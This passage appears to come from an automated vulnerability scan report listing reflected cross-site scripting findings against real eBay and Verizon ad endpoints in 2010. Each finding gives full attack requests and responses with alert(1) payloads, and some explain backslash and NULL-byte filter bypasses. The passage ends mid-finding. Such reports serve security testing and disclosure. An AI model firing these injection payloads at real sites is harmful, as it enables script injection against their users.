GET /ar/1/73255/4?mpt=1290348141&Perf_Tracker_1=0000778963&Perf_Tracker_2=0000857197&Perf_Tracker_3=1183&imp_id=7390300332479263209&siteid=0&icep_siteid=0&ipn=admain&adtype=3&size=728x90&adid=290222&mpvc=http://ib.adnxs.com/click/AAAAAAAAAAAAAAAAAAAAAAAAAEAzM8M_AAAAAAAAAAAAAAAAAAAAAOmx4DT_no9mfxe8qqcfxE5tJulMAAAAAFxIAgBkAAAAZAAAAAIAAACGgwEAAQAAAFVTRABVU0QA2AJaAKAEAACUBwACAwIFAAAAAABXE3uK/cnd=!HyTSyAjuDhCGhwYYyG0groIBKAAxAAAAAAAAAABCEwgAEAAYACABKP7__________wFCEwgKEAAYACACKP7__________wFCEwgLEAAYACADKP7__________wFIAFAAWKAJ/referrer=http%253A%252F%252Fwww.drudgereport.com%252F/clickenc=http%253A%252F%252Fr1.ace.advertising.com%252Fclick%252Fsite%253D0000778963%252Fmnum%253D0000857197%252Fcstr%253D18249923%253D_4ce9266d%252C8572034715%252C778963%255E857197%255E1183%255E0%252C1_%252Fxsxdata%253D%2524xsxdata%252Fbnum%253D18249923%252Foptn%253D64%253Ftrg%253D&df566"%3balert(1)//cf67b87541e=1 HTTP/1.1
Accept: */*
Referer: http://www.drudgereport.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Cookie: npii=btrm/svid%3D916267332304eca4085^cguid/66612c7712c0a0aad396b2c6fef710ef4eca4085^
Proxy-Connection: Keep-Alive
Pragma: no-cache
Host: rover.ebay.com

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 14:19:35 GMT
Server: Apache
Last-Modified: Mon, 15 Nov 2010 05:25:33 GMT
ETag: "6ba053-203c-49510ab4fed40"
Accept-Ranges: bytes
Content-Length: 23007
Content-Type: application/x-javascript

document.write( "<div id=\"foldcheck\">" );

/******** DAP Code ********/
var UTCoffset=0;
var UTCdt=0;
var engStartTime=0;
var engTime=0;
var engEvent=new Array();
var engData=new Array();
var above
...[SNIP]...
= "ir_DAP_M7=" + M7;

return params;
}
catch (err) {
return "";
}
return "";
}
var dapParams = mp_getMPVariables("rover.ebay.com/rover/1/711-112902-2042-4/4?df566";alert(1)//cf67b87541e=1&mpt=1290348141&siteid=0&Perf_Tracker_1=0000778963&Perf_Tracker_2=0000857197&Perf_Tracker_3=1183&adid=290222&imp_id=7390300332479263209&fcid=290232&ir_DAP_I131=3&ir_DAP_I132=1&ir_DAP_I133=66612c7712c
...[SNIP]...

2.641. http://rover.ebay.com/ar/1/73683/4 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /ar/1/73683/4

Issue detail

The value of the mpvc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be351"><script>alert(1)</script>83829e5e3d3 was submitted in the mpvc parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ar/1/73683/4?mpt=0.7275382493584849&siteid=0&icep_siteid=0&ipn=admain&adtype=2&size=300x250&adid=291982&mpvc=http://global.ard.yahoo.com/SIG=15pe7gbcs/M=783442.14407479.14263434.1806201/D=sports/S=25664825:LREC/_ylt=AiR28G1Vs1Az99xcGTMmgLo5nYcB/Y=YAHOO/EXP=1290215029/L=YHo8l0LEah79SQS9TNcPQwDgrnoX2kznAlUAAtD./B=tuDeAUJe5kI-/J=1290207829240910/K=LvOfhCMGqXVab3ZFq2dxJA/A=6239653/R=0/*be351"><script>alert(1)</script>83829e5e3d3 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://sports.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: rover.ebay.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 16:57:50 GMT
Server: Apache
Last-Modified: Mon, 15 Nov 2010 05:29:15 GMT
ETag: "5e2033-2299-49510b88b60c0"
Accept-Ranges: bytes
Content-Length: 17661
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://global.ard.yahoo.com/SIG=15pe7gbcs/M=783442.14407479.14263434.1806201/D=sports/S=25664825:LREC/_ylt=AiR28G1Vs1Az99xcGTMmgLo5nYcB/Y=YAHOO/EXP=1290215029/L=YHo8l0LEah79SQS9TNcPQwDgrnoX2kznAlUAAtD./B=tuDeAUJe5kI-/J=1290207829240910/K=LvOfhCMGqXVab3ZFq2dxJA/A=6239653/R=0/*be351"><script>alert(1)</script>83829e5e3d3http://rover.ebay.com/rover/1/711-112902-1039-4/4?mpt=0.7275382493584849&siteid=0&adid=291982&fcid=291992&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_D
...[SNIP]...

2.642. http://rover.ebay.com/ar/1/73683/4 [mpvc parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /ar/1/73683/4

Issue detail

The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3801f"%3balert(1)//e6982734887 was submitted in the mpvc parameter. This input was echoed as 3801f";alert(1)//e6982734887 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ar/1/73683/4?mpt=0.7275382493584849&siteid=0&icep_siteid=0&ipn=admain&adtype=2&size=300x250&adid=291982&mpvc=http://global.ard.yahoo.com/SIG=15pe7gbcs/M=783442.14407479.14263434.1806201/D=sports/S=25664825:LREC/_ylt=AiR28G1Vs1Az99xcGTMmgLo5nYcB/Y=YAHOO/EXP=1290215029/L=YHo8l0LEah79SQS9TNcPQwDgrnoX2kznAlUAAtD./B=tuDeAUJe5kI-/J=1290207829240910/K=LvOfhCMGqXVab3ZFq2dxJA/A=6239653/R=0/*3801f"%3balert(1)//e6982734887 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://sports.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: rover.ebay.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 16:57:56 GMT
Server: Apache
Last-Modified: Mon, 15 Nov 2010 05:29:15 GMT
ETag: "5e2033-2299-49510b88b60c0"
Accept-Ranges: bytes
Content-Length: 17451
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://global.ard.yahoo.com/SIG=15pe7gbcs/M=783442.14407479.14263434.1806201/D=sports/S=25664825:LREC
...[SNIP]...
1/D=sports/S=25664825:LREC/_ylt=AiR28G1Vs1Az99xcGTMmgLo5nYcB/Y=YAHOO/EXP=1290215029/L=YHo8l0LEah79SQS9TNcPQwDgrnoX2kznAlUAAtD./B=tuDeAUJe5kI-/J=1290207829240910/K=LvOfhCMGqXVab3ZFq2dxJA/A=6239653/R=0/*3801f";alert(1)//e6982734887http://rover.ebay.com%2Frover%2F1%2F711-112902-1039-4%2F4%3Fmpt%3D0.7275382493584849%26siteid%3D0%26adid%3D291982%26fcid%3D291992%26ir_DAP_I131%3D4%26ir_DAP_I132%3D1%26ir_DAP_I133%3D%26ir_DAP_I5%3D0%26
...[SNIP]...

2.643. http://rover.ebay.com/ar/1/73683/4 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /ar/1/73683/4

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 18cdf"><script>alert(1)</script>0d576c2e3f1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /ar/1/73683/4?mpt=0.7275382493584849&siteid=0&icep_siteid=0&ipn=admain&adtype=2&size=300x250&adid=291982&mpvc=http://global.ard.yahoo.com/SIG=15pe7gbcs/M=783442.14407479.14263434.1806201/D=sports/S=25664825:LREC/_ylt=AiR28G1Vs1Az99xcGTMmgLo5nYcB/Y=YAHOO/EXP=1290215029/L=YHo8l0LEah79SQS9TNcPQwDgrnoX2kznAlUAAtD./B=tuDeAUJe5kI-/J=1290207829240910/K=LvOfhCMGqXVab3ZFq2dxJA/A=6239653/R=0/*&18cdf"><script>alert(1)</script>0d576c2e3f1=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://sports.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: rover.ebay.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: p4n%60rujfudlwc%3D9vt*u6ubn564-12c6f5ef008
Set-Cookie: npii=btrm/svid%3D244856816194eca8319^cguid/6f5ef00812c0a0aad207d2e7fec2080c4eca8319^; Domain=.ebay.com; Expires=Mon, 21-Nov-2011 16:58:01 GMT; Path=/
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa ADMa DEVa PSDo PSAa OUR SAMo IND UNI COM NAV INT STA DEM PRE"
Cache-Control: private, no-cache
Pragma: no-cache
Content-Type: text/html
Content-Length: 781
Date: Sun, 21 Nov 2010 16:58:01 GMT

<html><body bgcolor=#ffffff leftmargin="0" topmargin="0"><a target="_blank" href="http://global.ard.yahoo.com/SIG=15pe7gbcs/M=783442.14407479.14263434.1806201/D=sports/S=25664825:LREC/_ylt=AiR28G1Vs1A
...[SNIP]...
9/L=YHo8l0LEah79SQS9TNcPQwDgrnoX2kznAlUAAtD./B=tuDeAUJe5kI-/J=1290207829240910/K=LvOfhCMGqXVab3ZFq2dxJA/A=6239653/R=0/*http://rover.ebay.com/rover/1/711-112902-1039-4/4?mpt=0.7275382493584849&siteid=0&18cdf"><script>alert(1)</script>0d576c2e3f1=1&adid=291982&fcid=291992&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=171954245986">
...[SNIP]...

2.644. http://rover.ebay.com/ar/1/73683/4 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://rover.ebay.com
Path:   /ar/1/73683/4

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffeb8</script><script>alert(1)</script>6fdc37eaaf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ar/1/73683/4?mpt=0.7275382493584849&siteid=0&icep_siteid=0&ipn=admain&adtype=2&size=300x250&adid=291982&mpvc=http://global.ard.yahoo.com/SIG=15pe7gbcs/M=783442.14407479.14263434.1806201/D=sports/S=25664825:LREC/_ylt=AiR28G1Vs1Az99xcGTMmgLo5nYcB/Y=YAHOO/EXP=1290215029/L=YHo8l0LEah79SQS9TNcPQwDgrnoX2kznAlUAAtD./B=tuDeAUJe5kI-/J=1290207829240910/K=LvOfhCMGqXVab3ZFq2dxJA/A=6239653/R=0/*&ffeb8</script><script>alert(1)</script>6fdc37eaaf=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://sports.yahoo.com/
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: rover.ebay.com
Proxy-Connection: Keep-Alive

Response (redirected)

HTTP/1.1 200 OK
Date: Sun, 21 Nov 2010 16:58:27 GMT
Server: Apache
Last-Modified: Mon, 15 Nov 2010 05:29:15 GMT
ETag: "5e2033-2299-49510b88b60c0"
Accept-Ranges: bytes
Content-Length: 18179
Content-Type: text/html; charset=ISO-8859-1

<HTML>
<BODY LEFTMARGIN="0" TOPMARGIN="0" MARGINWIDTH="0" MARGINHEIGHT="0">
<NOSCRIPT>
<a href="http://global.ard.yahoo.com/SIG=15pe7gbcs/M=783442.14407479.14263434.1806201/D=sports/S=25664825:LREC
...[SNIP]...
return params;
}
catch (err) {
return "";
}
return "";
}
var dapParams = mp_getMPVariables("rover.ebay.com/rover/1/711-112902-1039-4/4?mpt=0.7275382493584849&siteid=0&ffeb8</script><script>alert(1)</script>6fdc37eaaf=1&adid=291982&fcid=291992&ir_DAP_I131=4&ir_DAP_I132=1&ir_DAP_I133=&ir_DAP_I5=0&ir_DAP_I6=0&ir_DAP_I129=&ir_DAP_I130=&ir_DAP_I105=0&ir_DAP_I106=0&rvr_id=171951458685", "6335836", "<geozip/>
...[SNIP]...

2.645. http://syndicate.verizon.com/ads/scripthandler.ashx [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.verizon.com
Path:   /ads/scripthandler.ashx

Issue detail

The value of the source request parameter is copied into a JavaScript rest-of-line comment. The payload 90268%0aalert(1)//f82c3752a7a was submitted in the source parameter. This input was echoed as 90268
alert(1)//f82c3752a7a
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/scripthandler.ashx?source=vznewsroom.net/homepage.html90268%0aalert(1)//f82c3752a7a HTTP/1.1
Accept: */*
Referer: http://headlines.verizon.com/headlines/portals/headlines.portal?_nfpb=true&_pageLabel=headlines_portal_page_mediarooma29f5"style%3d"x%3aexpression(alert(1))"9c0eacd0b77
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: syndicate.verizon.com
Proxy-Connection: Keep-Alive
Cookie: vsrecentsearches=%26%2339%3b%26%2339%3b~%26%2339%3b~~~; V347=38J7laQNGQyUQYebWyb8dnlR6FarQ_tWSvDOV9jHkc9v4p6lQXSPuJw; vzapps=STATE=TX; AIMSPRESESSIONIDSIT=jQYXMpLTbQYsW1pVn7qH7HGykY9NkVJsCdW9m8yWY2jTQWtljvZT!-613549238!1160490364; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&lec=&dsl=&fios=&fiostvown=&fiosvoice=&vzw=&vca=&mm=&msv=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 1166
Date: Sun, 21 Nov 2010 22:14:54 GMT
Connection: close

// using application id: vznewsroom.net
// using page id: homepage.html90268
alert(1)//f82c3752a7a



           var vz_included_elements = new Array();    // remember everything we've added to the DOM
                                                   // this will redefine the existing array

           function vz_include_script( filename, defer )

...[SNIP]...

2.646. http://syndicate.verizon.net/ads/js.ashx [page parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/js.ashx

Issue detail

The value of the page request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 63c88\'%3balert(1)//ae87b284984 was submitted in the page parameter. This input was echoed as 63c88\\';alert(1)//ae87b284984 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/js.ashx?page=shopvz.net/homepage63c88\'%3balert(1)//ae87b284984&pos=Right,Right1 HTTP/1.1
Host: syndicate.verizon.net
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/Shop/Utilities/verizonyourdomain.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2cgrvsiuxtasbv552h1j3v45; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2723
Date: Sat, 20 Nov 2010 02:06:45 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'shopvz.net/homepage63c88\\';alert(1)//ae87b284984';
OAS_listpos = 'Right,Right1';
OAS_query = 'popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&
...[SNIP]...

2.647. http://syndicate.verizon.net/ads/js.ashx [pos parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/js.ashx

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2e25b\'%3balert(1)//34bbd0c359d was submitted in the pos parameter. This input was echoed as 2e25b\\';alert(1)//34bbd0c359d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /ads/js.ashx?page=shopvz.net/homepage&pos=Right,Right12e25b\'%3balert(1)//34bbd0c359d HTTP/1.1
Host: syndicate.verizon.net
Proxy-Connection: keep-alive
Referer: http://surround.verizon.net/Shop/Utilities/verizonyourdomain.aspx
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ASP.NET_SessionId=2cgrvsiuxtasbv552h1j3v45; amlbcookie=02; lob=webmail; POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 2723
Date: Sat, 20 Nov 2010 02:06:46 GMT
Connection: close

//Copyright (c) 2000-2003 by 24/7 Real Media, Inc. ALL RIGHTS RESERVED. 3/13/2008
//New changes made on 06/25 and pushed to fuat on 06/25
//configuration
OAS_url = 'http://oascentral.verizononline.com/RealMedia/ads/';
OAS_sitepage = 'shopvz.net/homepage';
OAS_listpos = 'Right,Right12e25b\\';alert(1)//34bbd0c359d';
OAS_query = 'popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&vi
...[SNIP]...

2.648. http://syndicate.verizon.net/ads/scripthandler.ashx [source parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://syndicate.verizon.net
Path:   /ads/scripthandler.ashx

Issue detail

The value of the source request parameter is copied into a JavaScript rest-of-line comment. The payload 6b9cd%0aalert(1)//95fd6b3e0 was submitted in the source parameter. This input was echoed as 6b9cd
alert(1)//95fd6b3e0
in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ads/scripthandler.ashx?source=business2.vz.net/out/travelportlet6b9cd%0aalert(1)//95fd6b3e0 HTTP/1.1
Accept: */*
Referer: http://business.verizon.net/SMBPortalWeb/smb_portlets/myapplication_rp/smb_orbitz.jsp
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: syndicate.verizon.net
Proxy-Connection: Keep-Alive
Cookie: POPLocation=popip=174.122.23.218&popindicator=&popcity=&popstate=&popzipcode=&popcounty=&popdma=&popservice=&connex=&prizm=&usertype=&partner=&fiostvown=&fiosvoice=&vasonly=&npa=&nxx=&msp=&pws=&viss=&vgodfamily=&vgodunlim=&vec=&vsbb=&pts=&online_backup=&audio_conf=&smb_premmail=&sec_email=&webhosting=&bbaw=&smb_enh_msg=&webex=; POPRefid=refid=&refresh=y&reftrytime=0&refnum=

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/plain; charset=utf-8
Content-Length: 1170
Date: Sun, 21 Nov 2010 22:29:26 GMT
Connection: close

// using application id: business2.vz.net
// using page id: out/travelportlet6b9cd
alert(1)//95fd6b3e0



           var vz_included_elements = new Array();    // remember everything we've added to the DOM
                                                   // this will redefine the existing array

           function vz_include_script( filename, defer )

...[SNIP]...

2.649. http://redcated/APM/iview/273561243/direct [click parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://redcated
Path:   /APM/iview/273561243/direct

Issue detail

The value of the click request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5182b</script>5fc389fc963 was submitted in the click parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open <SCRIPT> tag and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /APM/iview/273561243/direct;wi.300;hi.250/01?time=0.434555560536665&click=http://global.ard.yahoo.com/SIG=15nntbav7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*5182b</script>5fc389fc963 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.yahoo.com/news/common/pages/generic/darla/md?en=utf-8
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: redcated
Proxy-Connection: Keep-Alive
Cookie: AA002=1290036034-1562307; MUID=CEB33434C0164921BC56F0EB31A08430

Response

HTTP/1.1 200 OK
Cache-Control: no-store
Content-Length: 2680
Content-Type: text/html
Expires: 0
Connection: close
Date: Fri, 19 Nov 2010 23:27:40 GMT

<SCRIPT Language="Javascript">
var DCcode = "rmm.msnbc/carvingboard_300x250_c";
var DCwidth = "300";
var DCheight = "250";
var randNum = Math.floor(Math.random() * 100000000) + 100000000;
var ifr
...[SNIP]...
v7/M=782480.14428767.14283337.1442997/D=news/S=81121452:LREC/Y=YAHOO/EXP=1290214422/L=C2BmnkLEatn9SQS9TNcPQybLrnoX2kzm__YABG.H/B=nirsAUJe5i0-/J=1290207222312406/K=UBe7wFxsCvrgwq9VTCRZWQ/A=6254463/R=0/*5182b</script>5fc389fc963http://clk.redcated/goiframe/191362211.191524283/273561243/direct/01%3fhref=";
var scriptsrc = "http://ad.DoubleClick.net/adj/" + DCcode + ";abr=!ie;sz=" + DCwidth + "x" + DCheight + ";ord=" + randNu
...[SNIP]...

2.650. http://redcated/APM/iview/273561243/direct [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://redcated
Path:   /APM/iview/273561243/direct

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload %00579d7"-alert(1)-"1f04857c051 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 579d7"-alert(1)-"1f04857c051 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

